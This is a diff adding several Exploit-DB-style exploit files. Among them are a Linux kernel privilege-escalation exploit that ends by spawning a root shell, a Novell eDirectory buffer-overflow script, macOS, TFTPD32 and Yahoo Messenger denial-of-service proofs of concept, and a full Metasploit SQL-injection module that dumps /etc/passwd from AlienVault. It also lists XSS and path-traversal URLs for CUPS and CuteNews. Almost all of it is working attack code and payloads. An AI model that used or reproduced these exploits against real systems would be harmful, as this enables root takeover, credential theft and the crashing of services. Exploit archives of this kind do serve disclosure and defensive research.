+	  req.r.sdiag_family = family;
+	  
+	  if(family>255){
+		printf("nl_table is too far!\n");
+		exit(1);
+		}
+	}
+	else if(strcmp(argv[1],"Ubuntu")==0){
+	  commit_creds = (_commit_creds) 0xc106bc60;
+	  prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
+	  req.r.sdiag_family = 81;
+	}
+
+	unsigned long mmap_start, mmap_size;
+	mmap_start = 0x10000;
+	mmap_size = 0x120000;
+	printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
+
+        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
+                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
+                printf("mmap fault\n");
+                exit(1);
+        }
+	memset((void*)mmap_start, 0x90, mmap_size);
+
+	char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
+	unsigned long *asd = &jump[4];
+	*asd = (unsigned long)kernel_code;
+
+	memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
+
+	if ( send(fd, &req, sizeof(req), 0) < 0) {
+		printf("bad send\n");
+		close(fd);
+		return -1;
+	}
+
+	printf("uid=%d, euid=%d\n",getuid(), geteuid() );
+
+	if(!getuid())
+		system("/bin/sh");
+
+}

platforms/linux/remote/33339.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36958/info
+
+
+CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
+
+This issue affects versions prior to CUPS 1.4.2. 
+
+http://www.example.com/admin/?kerberos=onmouseover=alert 

platforms/novell/remote/33351.pl

@@ -0,0 +1,72 @@
+source: http://www.securityfocus.com/bid/37009/info
+
+Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
+
+Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected. 
+
+#!usr\bin\perl
+#Vulnerability has found by HACKATTACK
+
+use WWW::Mechanize;
+
+use LWP::Debug qw(+);
+
+use HTTP::Cookies;
+
+$address=$ARGV[0];
+
+
+if(!$ARGV[0]){
+
+        print "Usage:perl $0 address\n";
+        
+exit();
+}
+
+
+
+$login = "$address/_LOGIN_SERVER_";
+
+$url = "$address/dhost/";
+
+$module = "modules?I:";
+
+$buffer = "A" x 2000;
+
+
+$vuln = $module.$buffer;
+
+#Edit the username and password.
+
+          $user = "username";
+
+          $pass = "password";
+
+#Edit the username and password.
+
+my $mechanize = WWW::Mechanize->new();
+
+
+$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
+
+
+$mechanize->timeout($url_timeout);
+
+$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
+
+
+    $mechanize->submit_form(
+
+                  form_name => "authenticator",
+
+                  fields    => {
+
+                     usr => $user,
+
+                     pwd => $pass},
+
+                     button => 'Login');
+
+$response2 = $mechanize->get("$url$vuln");

platforms/osx/dos/33337.c

@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/36915/info
+
+Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.
+
+Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users. 
+
+/*
+  Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS 
+  ==================================================
+  This code should be run in a loop and due to problems 
+  with mutex handling in ptrace a DoS can occur when a 
+  destroyed mutex is attempted to be interlocked by OSX 
+  kernel giving rise to a race condition. You may need
+  to run this code multiple times.
+  
+  - Tested against 10.5.6
+  - Tested against 10.5.7
+
+  while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
+
+  This code is dedicated to a friend who I met in this
+  place. Long live the exploit scene. R.I.P str0ke.
+
+  -- prdelka
+*/
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+
+int main(){
+	pid_t pid;
+	char *argv[] = {"id","","",0};
+	char *envp[] = {"",0};
+	pid = fork();
+	if(pid == 0){
+		usleep(100);
+		execve("/usr/bin/id",argv,envp);
+	}
+	else{
+		usleep(820);
+		if(ptrace(PT_ATTACH,pid,0,0)==0){
+			printf("[ PID: %d has been caught!\n",pid);
+			if(ptrace(PT_DETACH,pid,0,0)<0){
+				perror("Evil happens.");
+			}
+			usleep(1);
+			wait(0);
+			}
+		else{
+			perror("Fail!");
+		}
+	}
+	return(0);
+}
+

platforms/php/webapps/33317.txt

@@ -0,0 +1,264 @@
+Exploit Title: AlienVault newpolicyform.php SQLi
+Date: 5/9/2014
+Exploit Author: chrisdhebert[at]gmail.com
+Vendor Homepage: http://www.alienvault.com/
+Software Link: http://www.alienvault.com/free-downloads-services
+Version: 4.6.1 and below
+Tested on: Linux
+CVE : n/a
+Vendor Security Advisory : AV-11394 http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower
+
+Timeline:
+--------
+4/14/2014 (Vulnerablity Discovered)
+4/17/2014 (Vendor Informed with receipt)
+5/5/2014 (Vendor Patch Released v4.7.0)
+5/9/2014 (Public Release)
+
+Vendor Discription:
+------------------
+OSSIM is the most widely used SIEM offering, thanks in no small part to the open source
+community that has promoted its use. OSSIM provides all of the capabilities that a security
+professional needs from a SIEM offering, event collection, normalization, correlation and
+incident response - but it also does far more. Not simply satisfied with integrating data
+from existing security tools, OSSIM is built on the Unified Security Management platform
+which provides a common framework for the deployment, configuration, and management of your
+security tools.
+
+Vulnerability Details:
+---------------------
+The vulnerability can be classified as "SQL Injection" from authenticated users. No input validation is performed when processing parameters on the following request:
+GET /ossim/policy/newpolicyform.php?insertafter='SQLi HTTP/1.1
+
+Although this POC demonstrates READ access to files readable by u=mysql g=root o=all (such as /etc/passwd).  It should be noted that, an attacker should be able to WRITE to a new file with sufficient permissions such as /tmp/newfile.   After a quick search, exploiting this may be midigated by the current file permissions of /usr/share/*ossim/www/* and other vhosts handled by apache.  For those with more time, other writeable locations could be leveraged with this vulnerablity.
+
+
+Metasploit Module:
+-----------------
+##
+## This module requires Metasploit: http//metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+      'Description'    => %q{
+        AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
+        newpolicyform.php using the 'insertinto' parameter.  This module exploits the
+        lack of input filtering to read an arbitrary file from the file system.
+        Any authenticated user is able to exploit this, as administrator
+        privileges are not required.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Hebert <chrisdhebert[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['EDB', '#####TBD####']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true
+        },
+      'Platform'       => ['linux'],
+      'Privileged'     => false,
+      'DisclosureDate' => "May 9 2014"))
+
+      register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
+        OptString.new('USERNAME', [ true, 'Single username' ]),
+        OptString.new('PASSWORD', [ true, 'Single password' ]),
+        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
+      ], self.class)
+
+  end
+
+  def run
+
+    print_status("#{peer} - Get a valid session cookie...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
+    })
+
+    unless res and res.code == 200
+      print_error("#{peer} - Server did not respond in an expected way")
+      return
+    end
+
+    cookie = res.get_cookies
+
+    if cookie.blank?
+      print_error("#{peer} - Could not retrieve a cookie")
+      return
+    end
+
+    post = {
+      'embed' => '',
+      'bookmark_string' => '',
+      'user' => datastore['USERNAME'],
+      'passu' => datastore['PASSWORD'],
+      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
+    }
+
+    print_status("#{peer} - Login...")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => post,
+      'cookie' => cookie
+    })
+
+    unless res and res.code == 302
+      print_error("#{peer} - Server did not respond in an expected way")
+      return
+    end
+
+    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
+      print_error("#{peer} - Authentication failed")
+      return
+    end
+
+    cookie = res.get_cookies
+
+    if cookie.blank?
+      print_error("#{peer} - Could not retrieve the authenticated cookie")
+      return
+    end
+
+    i = 0
+    full = ''
+    filename = datastore['FILEPATH'].unpack("H*")[0]
+    i = 0
+    full = ''
+    filename = datastore['FILEPATH'].unpack("H*")[0]
+    left_marker = Rex::Text.rand_text_alpha(6)
+    right_marker = Rex::Text.rand_text_alpha(6)
+
+    print_status("#{peer} - Exploiting SQLi...")
+
+    loop do
+      file = sqli(left_marker, right_marker, i, cookie, filename)
+      return if file.nil?
+      break if file.empty?
+
+      str = [file].pack("H*")
+      full << str
+      vprint_status(str)
+
+      i = i+1
+    end
+
+    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
+    print_good("File stored at path: " + path)
+  end
+
+  def sqli(left_marker, right_marker, i, cookie, filename)
+    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
+    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
+
+    get = {
+      'insertafter' => pay,
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
+      'cookie' => cookie,
+      'vars_get' => get
+    })
+
+    if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
+      return $1
+    else
+      print_error("Server did not respond in an expected way")
+      return nil
+    end
+  end
+
+end
+
+
+
+Metasploit Module Use Example:
+-----------------------------
+msf > use auxiliary/gather/alienvault_newpolicyform_sqli
+msf auxiliary(alienvault_newpolicyform_sqli) > show options
+
+Module options (auxiliary/gather/alienvault_newpolicyform_sqli):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   FILEPATH   /etc/passwd      yes       Path to remote file
+   PASSWORD   putpasswordhere  yes       Single password
+   Proxies                     no        Use a proxy chain
+   RHOST      192.168.1.1      yes       The target address
+   RPORT      443              yes       The target port
+   TARGETURI  /                yes       Relative URI of installation
+   USERNAME   admin            yes       Single username
+   VHOST                       no        HTTP server virtual host
+
+msf auxiliary(alienvault_newpolicyform_sqli) > run
+
+[*] 192.168.1.1:443 - Get a valid session cookie...
+[*] 192.168.1.1:443 - Login...
+[*] 192.168.1.1:443 - Exploiting SQLi...
+[+] File stored at path: /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+[*] Auxiliary module execution completed
+msf auxiliary(alienvault_newpolicyform_sqli) > cat /home/user/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+[*] exec: cat /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+
+root:x:0:0:root:/root:/usr/bin/llshell
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+munin:x:102:104::/var/lib/munin:/bin/false
+postfix:x:103:106::/var/spool/postfix:/bin/false
+snmp:x:104:108::/var/lib/snmp:/bin/false
+hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
+avserver:x:106:111:AlienVault SIEM,,,:/home/avserver:/bin/false
+avapi:x:107:111:AlienVault SIEM,,,:/home/avapi:/bin/bash
+avidm:x:108:111:AlienVault IDM,,,:/home/avidm:/bin/false
+ossec:x:1000:1000::/var/ossec/:/bin/false
+ossecm:x:1001:1000::/var/ossec/:/bin/false
+ossecr:x:1002:1000::/var/ossec/:/bin/false
+ntop:x:109:112::/var/lib/ntop:/bin/false
+avagent:x:110:111:AlienVault Agent,,,:/home/avagent:/bin/false
+snort:x:111:113:Snort IDS:/var/log/snort:/bin/false
+prads:x:112:114::/home/prads:/bin/false
+nagios:x:113:115::/var/lib/nagios:/bin/false
+stunnel4:x:114:116::/var/run/stunnel4:/bin/false
+rabbitmq:x:115:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
+mysql:x:116:118:MySQL Server,,,:/var/lib/mysql:/bin/false
+
+msf auxiliary(alienvault_newpolicyform_sqli) >
+
+

platforms/php/webapps/33340.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/index.php?lastusername='%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E

platforms/php/webapps/33341.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+ 
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+ 
+Note that exploits for some of the issues may require administrator privilege.
+ 
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+ 
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010

platforms/php/webapps/33342.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/36971/info
+  
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+  
+Note that exploits for some of the issues may require administrator privilege.
+  
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+  
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+

platforms/php/webapps/33343.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+   
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+   
+Note that exploits for some of the issues may require administrator privilege.
+   
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+   
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E

platforms/php/webapps/33344.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+    
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+    
+Note that exploits for some of the issues may require administrator privilege.
+    
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+    
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/index.php?mod=addnews&action=addnews

platforms/php/webapps/33345.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/36971/info
+     
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+     
+Note that exploits for some of the issues may require administrator privilege.
+     
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+     
+A successful attack will compromise the application and may aid in further attacks. 
+
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00

platforms/windows/dos/33348.pl

@@ -0,0 +1,39 @@
+# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
+# Date: 13/05/2014
+# Exploit Author: j0s3h4x0r
+# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
+# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
+# Version: 4.5 32 bits / 4.5 64 bits
+# Tested on: [Windows 7 x64]
+
+#this proof of concept code will crash tftpd32 and tftpd64
+#you can try changing $j and $i loop limits
+#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
+#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
+
+## Exploit-DB Note: $j=5, $i=2500 caused a crash. 
+
+
+
+#!/usr/bin/perl -w
+
+use IO::Socket;
+
+for (my $j = 0; $j < 2; $j++)
+{
+	sleep(2);
+	for (my $i = 0; $i < 1500; $i++)
+	{
+		$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
+	
+		$p_c_buffer = "\x0c\x0d" x 10;
+	
+		print $st_socket $p_c_buffer;
+	
+		close($st_socket);
+
+		print "sent " . $i . "\n";
+	}
+}
+
+exit;

platforms/windows/dos/33350.xml

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/37007/info
+
+Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+
+Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected. 
+
+<?XML version='1.0' standalone='yes' ?>
+
+<package><job id='DoneInVBS' debug='false' error='true'>
+
+<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
+
+<script language='vbscript'>
+
+
+arg1=String(11284, "A")
+
+target.RegisterMe arg1
+
+</script>
+
+</job>
+
+</package>